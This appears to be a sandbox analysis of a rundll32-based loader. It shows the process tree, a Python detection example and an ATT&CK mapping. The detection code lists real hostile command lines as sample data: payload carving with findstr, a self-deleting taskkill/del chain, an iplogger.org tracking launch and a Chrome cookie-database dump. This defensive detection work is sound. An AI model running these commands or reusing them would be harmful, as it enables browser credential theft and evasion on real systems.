- PID 4820  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main  (image: C:\Windows\system32\rUNdlL32.eXe)
    tags: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
  - PID 4876  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main  (image: C:\Windows\SysWOW64\rundll32.exe)
      tags: Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- PID 4036  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    tags: Modifies registry class
- PID 4976  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    tags: Modifies registry class
- PID 5944  C:\Users\Admin\AppData\Local\Temp\4978.exe
- PID 5216  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main  (image: C:\Windows\system32\rUNdlL32.eXe)
    tags: Process spawned unexpected child process
  - PID 5180  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main  (image: C:\Windows\SysWOW64\rundll32.exe)
- PID 5820  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
- PID 4912  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main  (image: C:\Windows\system32\rUNdlL32.eXe)
    tags: Process spawned unexpected child process
  - PID 2488  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main  (image: C:\Windows\SysWOW64\rundll32.exe)
- PID 4296  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- PID 6528  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
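The process tree above contains several living-off-the-land command lines worth a rule each: a cmd.exe fed a script on stdin (cmd < Sorrisi.tmp), a findstr /V /R "^<random token>$" pass over a .tmp file (with a pattern that no line matches, findstr /V copies the whole file, which is how these droppers rebuild an executable under a new name such as Acre.exe.com), a ping 127.0.0.1 -n 30 used as a sleep, a taskkill / timeout / del chain that deletes the running binary, silent regedit /s imports, an explorer launch of an iplogger.org tracking URL, NirSoft-style /CookiesFile ... /scookiestxt switches pointed at browser Cookies databases, rundll32 loading a DLL from %TEMP% by export name, and repeated WerFault.exe launches for the same crashing PID. The following Python is an added example written for this page, not sandbox code and not code from any family named above. SAMPLE is a constructed subset of the tree's (PID, command line) pairs; the rule names and regular expressions are this example's own, and the threshold choices are assumptions.

```python
"""Command-line heuristics for the loader behaviour shown in the process tree above.
Added example for this page; SAMPLE is a constructed subset of that tree."""
import re

# Constructed sample: (PID, command line) pairs copied from the process tree.
SAMPLE = [
    (5276, r'"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp'),
    (5764, r'findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp'),
    (5828, r'Acre.exe.com k'),
    (5516, r'ping 127.0.0.1 -n 30'),
    (6832, r'"C:\Windows\System32\cmd.exe" /c taskkill /im seBCf4ZlNLZ9PaeYpIEYTmZ6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe" & del C:\ProgramData\*.dll & exit'),
    (7048, r'regedit /s adj.reg'),
    (4244, r'explorer https://iplogger.org/2LBCU6'),
    (2096, r'C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt'),
    (4820, r'rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main'),
    (4776, r'C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 660'),
    (2756, r'c:\windows\system32\svchost.exe -k netsvcs -s WpnService'),  # benign control
]

# (rule name, pattern). Names are this example's own; each maps to one behaviour above.
RULES = [
    ("cmd_stdin_script", re.compile(r'\bcmd(?:\.exe)?"?\s+/c\s+cmd\s*<\s*\S+', re.I)),
    # findstr /V with a long random anchored token: copies the file, rebuilds a payload
    ("findstr_carve", re.compile(r'\bfindstr(?:\.exe)?\s+/V\s+/R\s+"\^[A-Za-z0-9]{20,}\$"\s+\S+', re.I)),
    ("exe_com_launch", re.compile(r'\.exe\.com\b', re.I)),
    ("ping_sleep", re.compile(r'\bping(?:\.exe)?\s+127\.0\.0\.1\s+-n\s+\d+', re.I)),
    # taskkill of an image followed by del of a path ending in that same image name
    ("self_delete", re.compile(r'\btaskkill\b.*?/im\s+(\S+).*?\bdel\s+/f\s+/q\s+"[^"]*\1"', re.I | re.S)),
    ("regedit_silent", re.compile(r'\bregedit(?:\.exe)?\s+/s\s+\S+\.reg', re.I)),
    ("ip_logger_url", re.compile(r'https?://iplogger\.org/\S+', re.I)),
    ("cookie_db_read", re.compile(r'/CookiesFile\s+"[^"]*\\Cookies"\s+/scookiestxt\s+\S+', re.I)),
    ("rundll32_temp_dll", re.compile(r'\brundll32(?:\.exe)?\s+"?[^"]*\\AppData\\Local\\Temp\\[^"]+\.dll"?,\s*\w+', re.I)),
    ("werfault_for_pid", re.compile(r'\bWerFault\.exe\s+-u\s+-p\s+(\d+)', re.I)),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(entries):
    """Return {pid: [rule names]} for every (pid, cmdline) that matched at least one rule."""
    hits = {}
    for pid, cmdline in entries:
        tags = classify(cmdline)
        if tags:
            hits[pid] = tags
    return hits


def crash_loops(entries, min_reports=2):
    """Return {crashed pid: count} for PIDs that WerFault was launched for repeatedly."""
    rx = RULES[-1][1]
    counts = {}
    for _pid, cmdline in entries:
        m = rx.search(cmdline)
        if m:
            counts[int(m.group(1))] = counts.get(int(m.group(1)), 0) + 1
    return {pid: n for pid, n in counts.items() if n >= min_reports}


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE).items():
        print(pid, ", ".join(tags))
```

Each rule is deliberately narrow: cmd_stdin_script requires the inner cmd to read from a redirected file, self_delete requires the deleted path to end in the same image name that was killed, and rundll32_temp_dll requires both a %TEMP% path and an export name, so ordinary installer activity does not trip them. On the sample, every malicious line matches exactly one rule and the svchost control matches none. The crash_loops helper needs more than one WerFault line to fire; run it over the full tree, where PIDs 6120 and 6580 each produce five reports.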
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
  Disabling Security Tools (1)
  Install Root Certificate (1)
  Modify Registry (3)
  Virtualization/Sandbox Evasion (1)
  Web Service (1)